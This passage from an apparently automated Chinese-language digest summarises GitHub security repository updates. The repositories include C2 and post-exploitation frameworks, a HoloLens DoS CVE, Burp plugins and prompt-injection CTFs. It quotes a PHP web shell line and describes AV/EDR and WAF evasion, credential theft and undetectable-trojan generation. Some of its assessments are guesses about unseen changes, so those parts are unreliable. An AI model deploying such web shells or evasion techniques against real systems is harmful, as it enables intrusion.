> 修改了`dbgpt-serve`中`chat_stream_openai`方法,对`ChatCompletionResponseStreamChoice`的`delta`字段进行增强,增加了`reasoning_content`,以支持返回思维链。
|
|||
|
|
|
|||
|
|
> 更新了许多依赖库,包括`fastapi`,`openai`等,虽然具体安全修复细节未知,但存在安全改进的可能性。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• dbgpt-app
|
|||
|
|
• dbgpt-core
|
|||
|
|
• dbgpt-client
|
|||
|
|
• dbgpt-serve
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
增加了对模型思维链的支持,提升了模型解释性。修复了客户端和API的多个问题,提高了稳定性和安全性。 依赖更新也可能包含了安全修复。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### sw-security-web-app_AI - AI Prompt Filtering with DP
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [sw-security-web-app_AI](https://github.com/sw-security-web-app/sw-security-web-app_AI) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `Security Research` |
|
|||
|
|
| 更新类型 | `Feature Enhancement` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
This repository presents an AI-driven system designed to filter harmful prompts, especially those containing personal information. The system utilizes a BERT classifier fine-tuned on a dataset of private information leakage instances. The system incorporates data augmentation techniques and applies Differential Privacy during model training, enhancing its security posture. The update includes details about the system architecture, model architecture, data processing stages, base model creation process, and technologies used. This update showcases the continuous development and refinement of the system, addressing security concerns related to AI model safety and privacy.
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | AI-powered prompt filtering system to protect against malicious inputs. |
|
|||
|
|
| 2 | Implementation of Differential Privacy (DP) to enhance model security and prevent data leakage. |
|
|||
|
|
| 3 | Use of data augmentation techniques to improve robustness against adversarial attacks. |
|
|||
|
|
| 4 | Relevance to AI + Security is high: focuses on securing AI models and systems. |
|
|||
|
|
| 5 | Provides a multi-language prompt filtering solution. |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> The system employs a BERT Classifier model for prompt classification. The model is fine-tuned using labeled data.
|
|||
|
|
|
|||
|
|
> The model utilizes MarianMT for multi-language translation and Nlpaug for data augmentation. The data augmentation steps include synonym replacement, word deletion, word swapping, and typography modification to prevent prompt manipulation.
|
|||
|
|
|
|||
|
|
> Differential Privacy is applied during model training using the Opacus library, adding noise to the training process.
|
|||
|
|
|
|||
|
|
> The system uses a multi-step process from data translation, augmentation, model training, and DP application to enhance security.
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• AI Models
|
|||
|
|
• Data Processing Pipelines
|
|||
|
|
• Web Application Framework (FastAPI)
|
|||
|
|
• Machine Learning Frameworks (TensorFlow/PyTorch)
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
The repository is highly relevant to the 'AI+Security' search term because its core functionality revolves around securing AI models. The use of Differential Privacy and data augmentation is valuable. It provides a unique security research approach and implements a novel security feature. The repository offers an important security enhancement by protecting the system from malicious user inputs. The repository addresses a key security concern and applies a valuable defense mechanism, justifying its value.
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### oss-fuzz-gen - LLM模糊测试框架更新
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [oss-fuzz-gen](https://github.com/google/oss-fuzz-gen) |
|
|||
|
|
| 风险等级 | `LOW` |
|
|||
|
|
| 安全类型 | `安全功能/安全研究` |
|
|||
|
|
| 更新类型 | `GENERAL_UPDATE` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **4**
|
|||
|
|
- 变更文件数: **11**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是基于LLM的模糊测试框架,通过与OSS-Fuzz的集成实现。本次更新主要集中在实验配置、Prompt优化和BUG修复。具体包括:允许通过参数配置Agent的最大轮数,修复了可能导致OpenAI API错误的空Prompt问题,改进了JVM项目的Prompt,并修正了控制实验采样数量的逻辑。这些更新旨在提升框架的灵活性、稳定性和针对JVM项目的测试效率。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 灵活控制Agent的最大轮数,增强实验配置 |
|
|||
|
|
| 2 | 修复了OpenAI prompt生成中可能导致问题的空内容 |
|
|||
|
|
| 3 | 改进了JVM相关Prompts,减小代码体积,提升OFG性能 |
|
|||
|
|
| 4 | 修正了实验中采样数量的控制逻辑 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 新增了`--max-round` 参数,控制Agent的最大轮数,修改了`agent/base_agent.py`、`ci/k8s/pr-exp.yaml`、`ci/request_pr_exp.py`、`report/docker_run.sh`、`run_all_experiments.py`中的相关配置。
|
|||
|
|
|
|||
|
|
> 修复了`llm_toolkit/prompts.py`中可能生成空内容的Prompt,在添加prompt内容之前进行了空内容检查,避免了OpenAI API的潜在问题。
|
|||
|
|
|
|||
|
|
> 改进了JVM相关Prompts,减少了代码体积,修改和删除了`llm_toolkit/prompt_builder.py`、`prompts/template_xml/jvm_problem_constructor.txt`、`prompts/template_xml/jvm_problem_method.txt`,并新增`prompts/template_xml/jvm_target.txt`。
|
|||
|
|
|
|||
|
|
> 修改了`run_one_experiment.py`,正确控制实验的采样数量。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• LLM agents
|
|||
|
|
• Fuzzing experiments
|
|||
|
|
• OSS-Fuzz-gen framework
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
更新涉及配置和Prompt优化,提高了框架的可用性和效率。虽然没有直接的安全漏洞修复,但是提升了对JVM项目的模糊测试能力,有利于发现潜在的安全问题。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### Amnesiac - PowerShell后渗透框架
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [Amnesiac](https://github.com/Leo4j/Amnesiac) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `安全研究` |
|
|||
|
|
| 更新类型 | `GENERAL_UPDATE` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
Amnesiac是一个完全用PowerShell编写的后渗透框架,旨在协助在Active Directory环境中进行横向移动。虽然没有直接的C2框架,但Amnesiac提供了后渗透功能。如果更新涉及C2的改进,将大大提高其价值。该框架的功能包括横向移动,凭证窃取等,本次更新的内容需要进一步确认,以确定是否增强了C2功能或修复了安全漏洞。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 基于PowerShell的后渗透框架 |
|
|||
|
|
| 2 | 专为Active Directory环境设计 |
|
|||
|
|
| 3 | 实现横向移动功能 |
|
|||
|
|
| 4 | 本次更新可能包含C2通信改进 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> Amnesiac使用PowerShell脚本实现功能,具体实现细节需要查阅代码。
|
|||
|
|
|
|||
|
|
> 如果更新涉及到C2功能增强,可能包括更隐蔽的通信方式,更强的加密,以及更灵活的控制机制。如果更新修复了安全漏洞,则可能涉及到绕过安全防护,或权限提升等。
|
|||
|
|
|
|||
|
|
> 后渗透框架通常用于在受控环境中进行安全测试和评估。
|
|||
|
|
|
|||
|
|
> C2功能增强能够提高攻击者渗透的成功率,并使得攻击行为更难以被检测和阻止。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Active Directory
|
|||
|
|
• PowerShell
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
后渗透框架通常用于红队评估和安全测试,而Amnesiac结合了PowerShell和Active Directory的特性,使其在特定环境中具有很高的价值。如果更新改进了C2通信或修复了漏洞,将显著提升其价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### HBA-C2 - 基于HTTPS的C2框架
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [HBA-C2](https://github.com/nxvertime/HBA-C2) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `安全工具/C2框架` |
|
|||
|
|
| 更新类型 | `代码更新` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个C2(命令与控制)系统,使用HTTPS进行通信,旨在减少AV/EDR的检测。它包含C2服务器和客户端。该项目目标是创建一个功能齐全的C2系统,能够执行远程管理任务、测试反沙箱、持久化和提权等高级技术。本次更新修改了README.md文件,添加了启动服务器的命令。该仓库与关键词C2高度相关,并包含有价值的安全研究内容。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 基于HTTPS的C2框架 |
|
|||
|
|
| 2 | 包含C2服务器和客户端 |
|
|||
|
|
| 3 | 具有远程管理,权限提升等功能 |
|
|||
|
|
| 4 | 项目处于开发阶段 |
|
|||
|
|
| 5 | 与搜索关键词高度相关 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> C2服务器使用Golang编写,客户端使用C++编写。
|
|||
|
|
|
|||
|
|
> 使用HTTPS进行通信。
|
|||
|
|
|
|||
|
|
> 计划实现反沙箱、shellcode注入、远程shell、持久化机制、进程切换、DDoS功能、本地权限提升、密码窃取和键盘记录等功能。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• C2 server
|
|||
|
|
• C2 client
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库直接针对C2系统,与搜索关键词'c2'高度相关。它提供了一个C2框架,虽然目前功能尚未完全实现,但其设计目标和技术实现具有研究和实用价值。HTTPS通信减少检测的设计具有一定的技术创新性。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2024-57972 - HoloLens设备Portal DoS
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2024-57972 |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 利用状态 | `漏洞利用可用` |
|
|||
|
|
| 发布时间 | 2025-03-07 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-03-07 12:07:11 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2024-57972](https://github.com/tania-silva/CVE-2024-57972)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了关于针对HoloLens设备的拒绝服务(DoS)攻击的详细信息。攻击通过向HoloLens的设备门户API发送大量配对请求来实现,导致CPU过载,设备无响应。仓库包含攻击的架构图、演示和缓解方法。更新内容主要是添加了攻击的详细描述、攻击演示、缓解方法以及相关的图片说明,重点描述了基于 PowerShell 的攻击脚本,该脚本可以通过计划任务在 Windows 系统启动时运行。通过分析网络流量,攻击者可以模拟合法的配对请求,持续向设备发送请求,导致设备过载。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | HoloLens 设备Portal的DoS攻击 |
|
|||
|
|
| 2 | 通过发送配对请求导致设备过载 |
|
|||
|
|
| 3 | 攻击者与受害者位于同一网络 |
|
|||
|
|
| 4 | 攻击利用了PowerShell脚本 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 攻击原理:通过向 HoloLens 设备 Portal API 发送大量配对请求,导致设备CPU过载。
|
|||
|
|
|
|||
|
|
> 利用方法:攻击者需要在与受害者相同的网络中,通过网络扫描确定 HoloLens 的 IP 地址,然后使用脚本(例如 PowerShell)持续发送配对请求。 提交中提供了示例请求,并描述了如何通过网页元素检查来获取这些请求。
|
|||
|
|
|
|||
|
|
> 修复方案:在API层面限制来自特定IP的配对请求,并限制短时间内总请求数量。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• HoloLens 1 and 2
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞影响广泛使用的HoloLens设备,且有明确的利用方法和POC。利用条件明确,且攻击具有实际危害,可导致设备无法使用。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### rce - PHP RCE 漏洞利用代码
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [rce](https://github.com/haroohameed/rce) |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 安全类型 | `漏洞利用` |
|
|||
|
|
| 更新类型 | `新增POC` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **6**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库包含一个简单的PHP代码片段,该代码通过`system($_GET['cmd'])`实现RCE。用户可以通过GET请求中的`cmd`参数执行任意命令。虽然仓库其他部分更新与RCE无关,但核心文件提供了RCE漏洞利用的POC。由于功能明确且与关键词直接相关,因此具有一定的价值。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 提供了一个RCE(远程代码执行)漏洞利用的PHP代码片段。 |
|
|||
|
|
| 2 | 代码通过`system()`函数执行用户传入的命令。 |
|
|||
|
|
| 3 | 仓库与RCE关键词高度相关,直接涉及漏洞利用。 |
|
|||
|
|
| 4 | 虽然代码简单,但明确展示了RCE漏洞的利用方式。 |
|
|||
|
|
| 5 | 代码质量较低,但核心功能明确 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 代码使用`system()`函数,该函数在PHP中用于执行shell命令,没有进行输入验证,直接将用户传入的`cmd`参数传递给系统shell。
|
|||
|
|
|
|||
|
|
> 这种实现方式极易受到命令注入攻击,攻击者可以通过构造恶意命令来执行任意系统命令。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• PHP
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
仓库核心代码片段直接演示了RCE漏洞利用,与搜索关键词RCE高度相关,因此具有价值。虽然代码简单,没有其他安全相关特性,但其核心功能明确,可用于演示和测试。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### mytools - 哥斯拉Webshell二开,免杀
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [mytools](https://github.com/nn0nkey/mytools) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `漏洞利用/安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
- 变更文件数: **2**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个漏洞利用工具集合。本次更新重点在于对哥斯拉Webshell进行了二次开发,增加了流量规避功能,包括修改Cookie、UA,以及随机化的请求格式模拟。此外,还集成了PHP和JSP的免杀技术,能够生成免杀木马。更新还提到了CVE-2024-39027相关的内容。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 哥斯拉Webshell二开 |
|
|||
|
|
| 2 | 流量规避技术,包括修改Cookie、UA,以及请求格式伪装 |
|
|||
|
|
| 3 | PHP和JSP免杀技术,集成免杀木马生成 |
|
|||
|
|
| 4 | 更新涉及CVE-2024-39027相关利用 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 流量规避:修改Cookie的强特征,UA等弱特征随机化,请求包加入随机请求,伪造为请求jpg和js资源,修改响应包伪造WAF界面。
|
|||
|
|
|
|||
|
|
> PHP免杀:集成小刚师傅的免杀工具,一键生成免杀木马。
|
|||
|
|
|
|||
|
|
> JSP免杀:采用编码方式实现免杀。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Web applications
|
|||
|
|
• PHP applications
|
|||
|
|
• JSP applications
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
更新内容涉及Webshell的绕过技术(流量规避和免杀),能够帮助渗透测试人员在实际渗透测试中绕过WAF和其他安全防御措施,提高攻击成功率。同时,针对CVE-2024-39027相关的漏洞利用也增加了价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### UploadFuzz - Burp插件:文件上传漏洞Fuzz
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [UploadFuzz](https://github.com/Di-duo/UploadFuzz) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `安全工具` |
|
|||
|
|
| 更新类型 | `新项目` |
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个Burp Suite插件,专门设计用于自动化文件上传漏洞的Fuzz测试。它通过对文件上传功能进行模糊测试,以发现潜在的安全漏洞。由于针对的是文件上传漏洞,与'漏洞'关键词高度相关。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 自动化文件上传漏洞Fuzz测试 |
|
|||
|
|
| 2 | Burp Suite插件形式 |
|
|||
|
|
| 3 | 针对文件上传场景的漏洞检测 |
|
|||
|
|
| 4 | 与'漏洞'关键词高度相关 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 插件基于Burp Suite,利用其扩展能力实现Fuzz测试
|
|||
|
|
|
|||
|
|
> 自动化测试流程
|
|||
|
|
|
|||
|
|
> 可能包含多种文件类型和payload的测试
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Burp Suite
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该项目专注于文件上传漏洞的检测,与搜索关键词'漏洞'高度相关。它提供自动化Fuzz测试的功能,可以帮助安全研究人员和渗透测试人员发现潜在的漏洞,具有实用价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CorsAttack - CORS配置漏洞检测插件
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [CorsAttack](https://github.com/Di-duo/CorsAttack) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全工具` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
- 变更文件数: **2**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了一个 Burp Suite 插件,用于检测 CORS(跨域资源共享)配置漏洞。更新主要体现在 README.md 文档的完善,包括更详细的漏洞等级分类和使用注意事项。插件通过修改请求的 Origin 头来检测 CORS 配置是否安全。虽然未有新增的漏洞利用代码或 POC,但该工具本身针对安全问题,具有实用价值。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | Burp Suite 插件,用于检测 CORS 配置漏洞 |
|
|||
|
|
| 2 | README.md 文档更新,完善了漏洞等级分类和注意事项 |
|
|||
|
|
| 3 | 插件会自动修改请求的 Origin 头进行检测 |
|
|||
|
|
| 4 | 内置请求限流机制 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 插件基于 Burp Suite 扩展 API 开发,使用 Java 语言实现,具有跨平台兼容性。
|
|||
|
|
|
|||
|
|
> 更新后的文档详细说明了高危和低危 CORS 配置漏洞的等级划分标准。
|
|||
|
|
|
|||
|
|
> 插件会自动修改所有请求的 Origin 头,用户可以通过禁用插件来跳过某些请求。
|
|||
|
|
|
|||
|
|
> 内置5秒请求间隔的限流机制,防止过度检测
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Burp Suite
|
|||
|
|
• CORS 配置
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该插件专注于检测 CORS 配置漏洞,可以帮助安全研究人员和渗透测试人员快速识别潜在的跨域安全问题,虽然更新内容主要为文档和使用说明,但插件本身对安全测试有重要意义,属于有价值的安全工具。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### HostAttack - Host头攻击漏洞检测Burp插件
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [HostAttack](https://github.com/Di-duo/HostAttack) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `安全工具` |
|
|||
|
|
| 更新类型 | `新增` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了一个Burp Suite扩展插件,用于检测Host头攻击漏洞。插件主要功能包括自动检测Host头攻击、专门针对301跳转响应进行检测、修改Host头、检测Location头反射,并将检测结果添加到Burp的Scanner面板。更新内容为上传了插件文件,提供了基本的Host头攻击检测功能。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 自动检测Host头攻击漏洞的Burp Suite扩展插件 |
|
|||
|
|
| 2 | 专门针对301跳转响应进行检测 |
|
|||
|
|
| 3 | 内置请求限流机制,避免对目标系统造成过大压力 |
|
|||
|
|
| 4 | 与漏洞关键词高度相关,专注于Host头攻击 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 插件通过修改HTTP请求的Host头为`attack.com`来触发Host头攻击。
|
|||
|
|
|
|||
|
|
> 检测响应状态码为301,并检查Location头是否反射了修改后的Host值
|
|||
|
|
|
|||
|
|
> 内置请求限流机制,避免对目标系统造成过大压力
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• HTTP服务器
|
|||
|
|
• Burp Suite
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该插件专注于Host头攻击漏洞的检测,与关键词“漏洞”高度相关,并且实现了自动检测和风险提示功能,具有一定的实用价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### owasp-ai-security-and-privacy-guide-ja - OWASP AI安全指南日语翻译
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [owasp-ai-security-and-privacy-guide-ja](https://github.com/coky-t/owasp-ai-security-and-privacy-guide-ja) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全研究` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
- 变更文件数: **2**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是OWASP AI安全与隐私指南的非官方日语翻译。更新主要增加了对LLM漏洞和攻击的参考,特别是添加了与LLM相关的CTF挑战,例如Doublespeak, MyLLMBank 和 MyLLMDoctor。 这些更新有助于提高对AI系统安全风险的认识,并提供了实践机会。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | OWASP AI安全与隐私指南的非官方日语翻译 |
|
|||
|
|
| 2 | 更新添加了与LLM漏洞相关的CTF挑战链接 |
|
|||
|
|
| 3 | 更新内容增强了指南的实用性 |
|
|||
|
|
| 4 | 涵盖了LLM的常见安全风险和攻击方式 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 更新的文件Document/content/ai_exchange/content/docs/ai_security_references.md,添加了多个LLM相关的CTF挑战的链接。这些CTF挑战涵盖了Prompt注入等LLM的常见漏洞。
|
|||
|
|
|
|||
|
|
> 更新修改了原文描述,增强了指南的实用性,使内容更加符合实际应用。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• LLM
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
